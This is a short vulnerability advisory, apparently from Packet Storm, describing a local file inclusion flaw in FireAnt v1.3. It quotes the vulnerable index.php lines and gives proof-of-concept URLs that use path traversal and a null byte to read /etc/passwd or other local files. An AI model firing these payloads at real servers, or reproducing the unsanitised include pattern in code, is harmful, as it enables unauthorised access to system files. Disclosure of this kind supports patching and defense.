FireAnt version 1.3 suffers from a local file inclusion vulnerability in index.php.
33b7e5d41d5643758b44cd89aac2f84bcd9a885464bc8c3adbb3ce7ef0d460d0###################################################################################
#
# Name : FireAnt v1.3 Local File Inclusion Vulnerability
# Author : cOndemned
# Dork : use Your brain (:
# Greetz : ZaBeaTy, str0ke, GregStar, irk4z, Sandtalker & Avantura ;**
#
###################################################################################
Source :
// index.php
8. $page = "bug_list"; //default page
9. if (!empty($_GET['page'])) {
10. $page = strip_tags($_GET['page']);
99. if (file_exists("./".$page.".php")) {
104. include("./".$page.".php");
Proof of Concept :
https://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00
https://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed